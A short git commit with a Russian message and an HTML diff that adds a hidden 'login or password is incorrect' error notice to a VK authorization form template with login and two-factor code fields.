Добавил уведомление о том что пароль неправильный

--- a/templates/vk_form.html
+++ b/templates/vk_form.html
@@ -59,7 +59,7 @@
                 <div class="vk_auth">
                     <span>Авторизация VK</span>
                 </div>
-            
+                    
                     <div class="vk_auth_login" id="vk_auth_login">
                         <p>
                             <p>Логин</p>
@@ -80,6 +80,9 @@
                             </div>
                             <input type="text" name="2fa" id="2fa_code" placeholder="Код подтверждения">
                         </p>
+                    </div>
+                    <div id="wrong-pass" style="display: none;color: red;">
+                        Логин или пароль неверен
                     </div>
                     <div class="vk_auth_submit">
                         <p>
